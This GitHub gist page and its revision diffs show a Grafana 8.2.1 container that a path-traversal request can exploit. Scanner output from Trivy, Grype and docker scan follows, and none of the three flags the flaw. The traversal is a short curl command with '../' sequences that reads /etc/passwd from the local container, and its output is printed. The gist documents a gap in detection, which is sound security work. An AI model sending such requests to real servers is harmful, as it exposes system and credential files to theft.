Last active
December 14, 2021 00:41
-
-
Save stefanlasiewski/eae57ed6d5c0aaf4ba4797c8ac796e30 to your computer and use it in GitHub Desktop.
Revisions
-
stefanlasiewski revised this gist
Dec 14, 2021 . 1 changed file with 37 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -38,6 +38,17 @@ stefanl@stefanl:~ $ trivy image --severity HIGH,CRITICAL grafana/grafana:8.2.1 | | | CVE-2021-42384 | | | | busybox: use-after-free in | | | CVE-2021-42385 | | | | busybox: use-after-free in | | | CVE-2021-42386 | | | | busybox: use-after-free in | stefanl@stefanl:~ $ trivy -v Version: 0.21.2 Vulnerability DB: Type: Full Version: 1 UpdatedAt: 2021-12-13 18:39:56.916824175 +0000 UTC NextUpdate: 2021-12-14 00:39:56.916823575 +0000 UTC DownloadedAt: 2021-12-13 20:06:06.505672 +0000 UTC stefanl@stefanl:~ ``` ## Anchore Grype @@ -71,6 +82,20 @@ ssl_client 1.33.1-r3 1.33.1-r ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42385 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42386 High stefanl@stefanl:~ $ stefanl@stefanl:~ $ grype version Application: grype Version: 0.27.0 Syft Version: v0.32.0 BuildDate: 2021-12-08T22:17:50Z GitCommit: e62186725b8bfe3faddb78fa82b1ca44c747c9b6 GitTreeState: clean Platform: darwin/amd64 GoVersion: go1.16.10 Compiler: gc Supported DB Schema: 3 stefanl@stefanl:~ $ ``` ## Docker Scan @@ -152,5 +177,17 @@ Tested 614 dependencies for known issues, found 3 issues. Tested 3 projects, 1 contained vulnerable paths. stefanl@stefanl:~ $ stefanl@stefanl:~ $ docker scan --version Version: v0.11.0 Git commit: c8da19f Provider: Snyk (1.563.0) stefanl@stefanl:~ $ docker --version Docker version 20.10.11, build dea9396 stefanl@stefanl:~ $ docker scan --version Version: v0.11.0 Git commit: c8da19f Provider: Snyk (1.563.0) stefanl@stefanl:~ $ ``` -
Dec 14, 2021 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
File renamed without changes. -
Dec 14, 2021 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -40,7 +40,7 @@ stefanl@stefanl:~ $ trivy image --severity HIGH,CRITICAL grafana/grafana:8.2.1 | | | CVE-2021-42386 | | | | busybox: use-after-free in | ``` ## Anchore Grype ``` stefanl@stefanl:~ $ grype -q grafana/grafana:8.2.1 |grep -i CVE -
Dec 14, 2021 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,156 @@ # This container is vulnerable: ``` stefanl@stefanl:~ $ docker run --rm -d --name=grafana -p 3000:3000 grafana/grafana:8.2.1 497f2c35813fa2f035252f241e40ef88ad24f458f5989f2e876940b0c00da698 stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../VERSION stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../../../../etc/passwd | head -3 % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 1230 100 1230 0 0 400k 0 --:--:-- --:--:-- --:--:-- 400k root:x:0:0:root:/root:/bin/ash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin stefanl@stefanl:~ $ ``` # However it isn't detected by `docker scan` (which uses Snyk), Aqua Trivy or Anchore Grype. ## Aqua Trivy ``` stefanl@stefanl:~ $ trivy image --severity HIGH,CRITICAL grafana/grafana:8.2.1 |grep CVE | busybox | CVE-2021-42378 | HIGH | 1.33.1-r3 | 1.33.1-r6 | busybox: use-after-free in | | | CVE-2021-42379 | | | | busybox: use-after-free in | | | CVE-2021-42380 | | | | busybox: use-after-free in | | | CVE-2021-42381 | | | | busybox: use-after-free in | | | CVE-2021-42382 | | | | busybox: use-after-free in | | | CVE-2021-42383 | | | | busybox: use-after-free in | | | CVE-2021-42384 | | | | busybox: use-after-free in | | | CVE-2021-42385 | | | | busybox: use-after-free in | | | CVE-2021-42386 | | | | busybox: use-after-free in | | ssl_client | CVE-2021-42378 | | | | busybox: use-after-free in | | | CVE-2021-42379 | | | | busybox: use-after-free in | | | CVE-2021-42380 | | | | busybox: use-after-free in | | | CVE-2021-42381 | | | | busybox: use-after-free in | | | CVE-2021-42382 | | | | busybox: use-after-free in | | | CVE-2021-42383 | | | | busybox: use-after-free in | | | CVE-2021-42384 | | | | busybox: use-after-free in | | | CVE-2021-42385 | | | | busybox: use-after-free in | | | CVE-2021-42386 | | | | busybox: use-after-free in | ``` # Anchore Grype ``` stefanl@stefanl:~ $ grype -q grafana/grafana:8.2.1 |grep -i CVE busybox 1.33.1-r3 1.33.1-r4 CVE-2021-42374 Medium busybox 1.33.1-r3 1.33.1-r5 CVE-2021-42375 Medium busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42378 High busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42379 High busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42380 High busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42381 High busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42382 High busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42383 High busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42384 High busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42385 High busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42386 High github.com/google/flatbuffers v1.12.0 CVE-2020-35864 High github.com/grafana/loki v1.6.2-0.20210520072447-15d417efe103 CVE-2021-36156 Medium github.com/prometheus/prometheus v1.8.2-0.20210621150501-ff58416a0b02 CVE-2019-3826 Medium google.golang.org/protobuf v1.27.1 CVE-2015-5237 High ssl_client 1.33.1-r3 1.33.1-r4 CVE-2021-42374 Medium ssl_client 1.33.1-r3 1.33.1-r5 CVE-2021-42375 Medium ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42378 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42379 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42380 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42381 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42382 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42383 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42384 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42385 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42386 High stefanl@stefanl:~ $ ``` ## Docker Scan ``` stefanl@stefanl:~ $ docker scan --severity medium grafana/grafana:8.2.1 Testing grafana/grafana:8.2.1... Organization: --- Package manager: apk Project name: docker-image|grafana/grafana Docker image: grafana/grafana:8.2.1 Platform: linux/amd64 Base image: grafana/grafana:8.2.1 Licenses: enabled ✓ Tested 34 dependencies for known issues, no vulnerable paths found. Base Image Vulnerabilities Severity grafana/grafana:8.2.1 11 0 critical, 0 high, 0 medium, 11 low Recommendations for base image upgrade: Minor upgrades Base Image Vulnerabilities Severity grafana/grafana:8.3.2 0 0 critical, 0 high, 0 medium, 0 low ------------------------------------------------------- Testing grafana/grafana:8.2.1... Organization: --- Package manager: gomodules Target file: /usr/share/grafana/bin/grafana-cli Project name: github.com/grafana/grafana Docker image: grafana/grafana:8.2.1 Licenses: enabled ✓ Tested 279 dependencies for known issues, no vulnerable paths found. ------------------------------------------------------- Testing grafana/grafana:8.2.1... ✗ Medium severity vulnerability found in github.com/cortexproject/cortex/pkg/tenant Description: Directory Traversal Info: https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMCORTEXPROJECTCORTEXPKGTENANT-1536565 Introduced through: github.com/cortexproject/cortex/pkg/tenant@#d382e1d80eaf From: github.com/cortexproject/cortex/pkg/tenant@#d382e1d80eaf Fixed in: 1.10.0-rc.1 ✗ High severity vulnerability found in github.com/ua-parser/uap-go/uaparser Description: Regular Expression Denial of Service (ReDoS) Info: https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMUAPARSERUAPGOUAPARSER-1569599 Introduced through: github.com/ua-parser/uap-go/uaparser@#daf92ba38329 From: github.com/ua-parser/uap-go/uaparser@#daf92ba38329 ✗ High severity vulnerability found in github.com/russellhaering/goxmldsig Description: Denial of Service (DoS) Info: https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOXMLDSIG-608301 Introduced through: github.com/russellhaering/[email protected] From: github.com/russellhaering/[email protected] Fixed in: 1.1.1 Organization: --- Package manager: gomodules Target file: /usr/share/grafana/bin/grafana-server Project name: github.com/grafana/grafana Docker image: grafana/grafana:8.2.1 Licenses: enabled Tested 614 dependencies for known issues, found 3 issues. Tested 3 projects, 1 contained vulnerable paths. stefanl@stefanl:~ $ ```